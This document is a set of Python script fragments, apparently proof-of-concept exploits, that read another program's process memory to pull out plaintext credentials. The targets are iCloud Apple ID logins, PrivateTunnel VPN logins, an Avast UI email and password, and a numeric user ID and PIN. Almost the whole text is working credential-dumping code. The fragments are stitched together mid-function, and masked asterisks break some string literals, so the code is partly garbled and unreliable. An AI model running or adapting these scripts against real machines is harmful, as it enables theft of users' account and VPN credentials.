def memory_search( pid ): found = [] # Instance a Process object. process = Process( pid ) # Search for the string in the process memory. # Looking for User ID: userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]' for address in process.search_regexp( userid_pattern ): found += [address] print 'Possible UserIDs found:' found = [i[-1] for i in found] for i in set(found): print i.replace('\x00','') found = [] # Looking for Password: pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00' for address in process.search_regexp( pass_pattern ): found += [process.read(address[0]-3,16)] if found: print '\nPassword:'******'[0-9]{4}',i.replace('\x00',''))[0] print pwd else: print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0] return found
print "#\t\t\tPlease use responsibly.\t\t\t\t#" print "#########################################################################\r\n" print "[~] Searching for pid by process name '%s'.." % (filename) time.sleep(1) debug.system.scan_processes() for (process, process_name) in debug.system.find_processes_by_filename(filename): process_pid = process.get_pid() if process_pid is not 0: print "[+] Found process with pid #%d" % (process_pid) time.sleep(1) print "[~] Trying to read memory for pid #%d" % (process_pid) process = Process(process_pid) user_pattern = '\x61\x70\x70\x6C\x65\x49\x44\x3D([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)' for address in process.search_regexp(user_pattern): memory_dump.append(address) usr = memory_dump[0][2].split('=')[1] memory_dump = [] pass_pattern = '\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00[\x01-\x02][\x08-\x09]([A-Za-z0-9\!\@\#\$\%\^\&\*\(\)\_\+\{\}\:\"\|\<\>\?\[\]\;\'\,\.\\\/\=\-]){8,20}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' for address in process.search_regexp(pass_pattern): lproj = re.findall('([a-z]{2}\.lproj)|(apple-[a-z]{0,3})', address[2]) if not lproj: cstr = re.sub(r'\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00[\x01-\x02][\x08-\x09]|\x00', '', address[2]) memory_dump.append(cstr) pwd = memory_dump[6] if usr != '' and pwd !='': found = 1 print "[+] iCloud Credentials found!\r\n----------------------------------------"
print "###########################################################################\r\n" print "[~] Searching for pid by process name '%s'.." % (filename) time.sleep(1) debug.system.scan_processes() for (process, process_name) in debug.system.find_processes_by_filename(filename): process_pid = process.get_pid() if process_pid is not 0: print "[+] Found process with pid #%d" % (process_pid) time.sleep(1) print "[~] Trying to read memory for pid #%d" % (process_pid) process = Process(process_pid) user_pattern = '\x20\x22\x70\x61\x73\x73\x77\x6F\x72\x64\x22\x20\x3A\x20\x22(.*)\x22\x2C\x0A\x20\x20\x20\x22\x75\x73\x65\x72\x6E\x61\x6D\x65\x22\x20\x3A\x20\x22(.*)\x22\x0A' for address in process.search_regexp(user_pattern): memory_dump.append(address) try: usr = memory_dump[0][2].split('"username" : "')[1].replace( '"\n', '') pwd = memory_dump[0][2].split('"password" : "')[1].split('",')[0] except: pass print "" if usr != '' and pwd != '': found = 1 print "[+] PrivateTunnel Credentials found!\r\n----------------------------------------" print "[+] Username: %s" % usr print "[+] Password: %s" % pwd if found == 0:
debug = Debug() processname = "AvastUI.exe" pid = 0 mem_contents = [] email = "" password = "" try: debug.system.scan_processes() for (process, process_name) in debug.system.find_processes_by_filename(processname): pid = process.get_pid() if pid is not 0: print ("AvastUI PID: " + str(pid)) process = Process(pid) for i in process.search_regexp('"password":"******"Dump: " print process.read(i[0], 200) for i in mem_contents: password = i.split(",")[0] for i in process.search_regexp('"email":"'): mem_contents.append(process.read(i[0], 200)) print "Dump: " print process.read(i[0], 200) for i in mem_contents: email = i.split(",")[0] if email != "" and password != "": print "" print "Found Credentials from Memory!" print email